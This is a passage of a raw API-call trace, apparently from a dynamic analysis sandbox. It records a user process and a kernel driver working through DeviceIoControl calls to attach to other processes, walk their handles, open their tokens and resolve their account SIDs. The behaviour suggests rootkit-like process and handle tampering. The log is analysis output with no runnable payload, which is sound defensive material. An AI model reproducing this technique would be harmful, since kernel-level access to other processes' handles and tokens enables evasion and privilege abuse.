KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0162.773] PsReleaseProcessExitSynchronization () returned 0x2 [0162.774] ObfDereferenceObject (Object=0xfffffa80025e4b30) returned 0x1a [0162.774] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80022ba044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80022ba044, ReturnLength=0xfffff88005163508) returned 0x0 [0162.774] ObfDereferenceObject (Object=0xfffffa80025e1b60) returned 0x1 [0162.774] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.774] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.774] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.774] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x2c, lpOverlapped=0x0) returned 1 [0162.774] PsLookupProcessByProcessId (in: ProcessId=0xb20, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0162.774] PsAcquireProcessExitSynchronization () returned 0x0 [0162.774] KeStackAttachProcess (in: PROCESS=0xfffffa80025e4b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80025e4b30, ApcState=0xfffff880051635d0) [0162.775] ObReferenceObjectByHandle (in: Handle=0x80, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800254cf20, HandleInformation=0x0) returned 0x0 [0162.775] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0162.775] PsReleaseProcessExitSynchronization () returned 0x2 [0162.775] ObfDereferenceObject (Object=0xfffffa80025e4b30) returned 0x1a [0162.775] ObQueryNameString (in: Object=0xfffffa8007bffb50, ObjectNameInfo=0xfffffa80022b9044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80022b9044, ReturnLength=0xfffff88005163508) returned 0x0 [0162.775] ObfDereferenceObject (Object=0xfffffa800254cf20) returned 0x3 [0162.775] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.775] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x91c) returned 0xc8 [0162.775] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0162.775] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8002591450, HandleInformation=0x0) returned 0x0 [0162.775] ObOpenObjectByPointer (in: Object=0xfffffa8002591450, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff800007c4) returned 0x0 [0162.775] ObfDereferenceObject (Object=0xfffffa8002591450) returned 0x20 [0162.776] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007c4, DesiredAccess=0x8, TokenHandle=0xfffffa80034f1d40 | out: TokenHandle=0xfffffa80034f1d40*=0xc4) returned 0x0 [0162.776] ZwClose (Handle=0xffffffff800007c4) returned 0x0 [0162.776] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.776] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0162.776] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0162.778] CloseHandle (hObject=0xc4) returned 1 [0162.778] CloseHandle (hObject=0xc8) returned 1 [0162.778] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.778] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0162.778] PsLookupProcessByProcessId (in: ProcessId=0x91c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0162.778] PsAcquireProcessExitSynchronization () returned 0x0 [0162.778] KeStackAttachProcess (in: PROCESS=0xfffffa8002591450, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002591450, ApcState=0xfffff880051635d0) [0162.778] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80025df9b0, HandleInformation=0x0) returned 0x0 [0162.778] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0162.778] PsReleaseProcessExitSynchronization () returned 0x2 [0162.778] ObfDereferenceObject (Object=0xfffffa8002591450) returned 0x1e [0162.778] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80022e5044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80022e5044, ReturnLength=0xfffff88005163508) returned 0x0 [0162.778] ObfDereferenceObject (Object=0xfffffa80025df9b0) returned 0x1 [0162.778] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.778] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.778] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.779] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x86, lpOverlapped=0x0) returned 1 [0162.779] PsLookupProcessByProcessId (in: ProcessId=0x91c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0162.779] PsAcquireProcessExitSynchronization () returned 0x0 [0162.779] KeStackAttachProcess (in: PROCESS=0xfffffa8002591450, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002591450, ApcState=0xfffff880051635d0) [0162.779] ObReferenceObjectByHandle (in: Handle=0x24, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80025e0860, HandleInformation=0x0) returned 0x0 [0162.779] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0162.779] PsReleaseProcessExitSynchronization () returned 0x2 [0162.779] ObfDereferenceObject (Object=0xfffffa8002591450) returned 0x1e [0162.779] ObQueryNameString (in: Object=0xfffffa80025e0860, ObjectNameInfo=0xfffffa80022e0044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80022e0044, ReturnLength=0xfffff88005163550) returned 0x0 [0162.779] ObfDereferenceObject (Object=0xfffffa80025e0860) returned 0x1 [0162.779] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.779] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.779] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.779] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0162.779] PsLookupProcessByProcessId (in: ProcessId=0x91c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0162.779] PsAcquireProcessExitSynchronization () returned 0x0 [0162.780] KeStackAttachProcess (in: PROCESS=0xfffffa8002591450, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002591450, ApcState=0xfffff880051635d0) [0162.780] ObReferenceObjectByHandle (in: Handle=0x78, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0162.780] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0162.780] PsReleaseProcessExitSynchronization () returned 0x2 [0162.780] ObfDereferenceObject (Object=0xfffffa8002591450) returned 0x1e [0162.780] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80022c4044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80022c4044, ReturnLength=0xfffff88005163550) returned 0x0 [0162.780] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x53 [0162.780] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.780] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.780] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.780] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x74, lpOverlapped=0x0) returned 1 [0162.780] PsLookupProcessByProcessId (in: ProcessId=0x91c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0162.780] PsAcquireProcessExitSynchronization () returned 0x0 [0162.780] KeStackAttachProcess (in: PROCESS=0xfffffa8002591450, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002591450, ApcState=0xfffff880051635d0) [0162.780] ObReferenceObjectByHandle (in: Handle=0xa4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80025d7d00, HandleInformation=0x0) returned 0x0 [0162.780] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0162.780] PsReleaseProcessExitSynchronization () returned 0x2 [0162.780] ObfDereferenceObject (Object=0xfffffa8002591450) returned 0x1e [0162.780] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80022bc044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80022bc044, ReturnLength=0xfffff88005163508) returned 0x0 [0162.780] ObfDereferenceObject (Object=0xfffffa80025d7d00) returned 0x1 [0162.780] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.780] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.781] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.781] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0162.781] PsLookupProcessByProcessId (in: ProcessId=0x91c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0162.781] PsAcquireProcessExitSynchronization () returned 0x0 [0162.781] KeStackAttachProcess (in: PROCESS=0xfffffa8002591450, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002591450, ApcState=0xfffff880051635d0) [0162.781] ObReferenceObjectByHandle (in: Handle=0xa8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0013c84c0, HandleInformation=0x0) returned 0x0 [0162.781] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0162.781] PsReleaseProcessExitSynchronization () returned 0x2 [0162.781] ObfDereferenceObject (Object=0xfffffa8002591450) returned 0x1e [0162.781] ObQueryNameString (in: Object=0xfffff8a0013c84c0, ObjectNameInfo=0xfffffa80022bd044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80022bd044, ReturnLength=0xfffff88005163550) returned 0x0 [0162.781] ObfDereferenceObject (Object=0xfffff8a0013c84c0) returned 0x1 [0162.781] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.781] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.781] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.781] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0162.781] PsLookupProcessByProcessId (in: ProcessId=0x91c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0162.781] PsAcquireProcessExitSynchronization () returned 0x0 [0162.781] KeStackAttachProcess (in: PROCESS=0xfffffa8002591450, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002591450, ApcState=0xfffff880051635d0) [0162.781] ObReferenceObjectByHandle (in: Handle=0xac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80025f6620, HandleInformation=0x0) returned 0x0 [0162.781] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0162.782] PsReleaseProcessExitSynchronization () returned 0x2 [0162.782] ObfDereferenceObject (Object=0xfffffa8002591450) returned 0x1e [0162.782] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80022be044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80022be044, ReturnLength=0xfffff88005163508) returned 0x0 [0162.782] ObfDereferenceObject (Object=0xfffffa80025f6620) returned 0x1 [0162.782] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.782] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.782] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.782] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0162.782] PsLookupProcessByProcessId (in: ProcessId=0x91c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0162.782] PsAcquireProcessExitSynchronization () returned 0x0 [0162.782] KeStackAttachProcess (in: PROCESS=0xfffffa8002591450, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002591450, ApcState=0xfffff880051635d0) [0162.782] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000fa9eb0, HandleInformation=0x0) returned 0x0 [0162.782] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0162.782] PsReleaseProcessExitSynchronization () returned 0x2 [0162.782] ObfDereferenceObject (Object=0xfffffa8002591450) returned 0x1e [0162.782] ObQueryNameString (in: Object=0xfffff8a000fa9eb0, ObjectNameInfo=0xfffffa80022bf044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80022bf044, ReturnLength=0xfffff88005163550) returned 0x0 [0162.782] ObfDereferenceObject (Object=0xfffff8a000fa9eb0) returned 0xe [0162.783] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.783] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.783] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x344) returned 0xc8 [0162.783] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0162.783] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa80025f06a0, HandleInformation=0x0) returned 0x0 [0162.783] ObOpenObjectByPointer (in: Object=0xfffffa80025f06a0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff800007c4) returned 0x0 [0162.783] ObfDereferenceObject (Object=0xfffffa80025f06a0) returned 0x25 [0162.783] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007c4, DesiredAccess=0x8, TokenHandle=0xfffffa80034f1d40 | out: TokenHandle=0xfffffa80034f1d40*=0xc4) returned 0x0 [0162.783] ZwClose (Handle=0xffffffff800007c4) returned 0x0 [0162.783] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.783] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0162.783] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0162.785] CloseHandle (hObject=0xc4) returned 1 [0162.785] CloseHandle (hObject=0xc8) returned 1 [0162.785] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.785] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x2c, lpOverlapped=0x0) returned 1 [0162.785] PsLookupProcessByProcessId (in: ProcessId=0x344, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0162.785] PsAcquireProcessExitSynchronization () returned 0x0 [0162.785] KeStackAttachProcess (in: PROCESS=0xfffffa80025f06a0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80025f06a0, ApcState=0xfffff880051635d0) [0162.785] ObReferenceObjectByHandle (in: Handle=0x4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800254cf20, HandleInformation=0x0) returned 0x0 [0162.785] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0162.785] PsReleaseProcessExitSynchronization () returned 0x2 [0162.786] ObfDereferenceObject (Object=0xfffffa80025f06a0) returned 0x23 [0162.786] ObQueryNameString (in: Object=0xfffffa8007bffb50, ObjectNameInfo=0xfffffa80022c0044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80022c0044, ReturnLength=0xfffff88005163508) returned 0x0 [0162.786] ObfDereferenceObject (Object=0xfffffa800254cf20) returned 0x3 [0162.786] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.786] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.786] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.786] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0162.786] PsLookupProcessByProcessId (in: ProcessId=0x344, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0162.786] PsAcquireProcessExitSynchronization () returned 0x0 [0162.786] KeStackAttachProcess (in: PROCESS=0xfffffa80025f06a0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80025f06a0, ApcState=0xfffff880051635d0) [0162.786] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80025daac0, HandleInformation=0x0) returned 0x0 [0162.786] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0162.786] PsReleaseProcessExitSynchronization () returned 0x2 [0162.786] ObfDereferenceObject (Object=0xfffffa80025f06a0) returned 0x23 [0162.786] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80022ec044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80022ec044, ReturnLength=0xfffff88005163508) returned 0x0 [0162.786] ObfDereferenceObject (Object=0xfffffa80025daac0) returned 0x1 [0162.786] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.786] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.786] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.786] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x114, lpOverlapped=0x0) returned 1 [0162.786] PsLookupProcessByProcessId (in: ProcessId=0x344, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0162.786] PsAcquireProcessExitSynchronization () returned 0x0 [0162.787] KeStackAttachProcess (in: PROCESS=0xfffffa80025f06a0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80025f06a0, ApcState=0xfffff880051635d0) [0162.787] ObReferenceObjectByHandle (in: Handle=0x20, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002632070, HandleInformation=0x0) returned 0x0 [0162.787] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0162.787] PsReleaseProcessExitSynchronization () returned 0x2 [0162.787] ObfDereferenceObject (Object=0xfffffa80025f06a0) returned 0x23 [0162.787] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80022ed044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80022ed044, ReturnLength=0xfffff88005163508) returned 0x0 [0162.787] ObfDereferenceObject (Object=0xfffffa8002632070) returned 0x1 [0162.787] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.787] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.787] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.787] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x2e, lpOverlapped=0x0) returned 1 [0162.787] PsLookupProcessByProcessId (in: ProcessId=0x344, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0162.787] PsAcquireProcessExitSynchronization () returned 0x0 [0162.787] KeStackAttachProcess (in: PROCESS=0xfffffa80025f06a0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80025f06a0, ApcState=0xfffff880051635d0) [0162.787] ObReferenceObjectByHandle (in: Handle=0x7c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800267d6f0, HandleInformation=0x0) returned 0x0 [0162.787] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0162.787] PsReleaseProcessExitSynchronization () returned 0x2 [0162.787] ObfDereferenceObject (Object=0xfffffa80025f06a0) returned 0x23 [0162.787] ObQueryNameString (in: Object=0xfffffa80019e2370, ObjectNameInfo=0xfffffa80022ee044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80022ee044, ReturnLength=0xfffff88005163508) returned 0x0 [0162.787] ObfDereferenceObject (Object=0xfffffa800267d6f0) returned 0x3 [0162.787] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.787] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.787] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0xc8 [0162.788] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0162.788] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa80026627f0, HandleInformation=0x0) returned 0x0 [0162.788] ObOpenObjectByPointer (in: Object=0xfffffa80026627f0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: 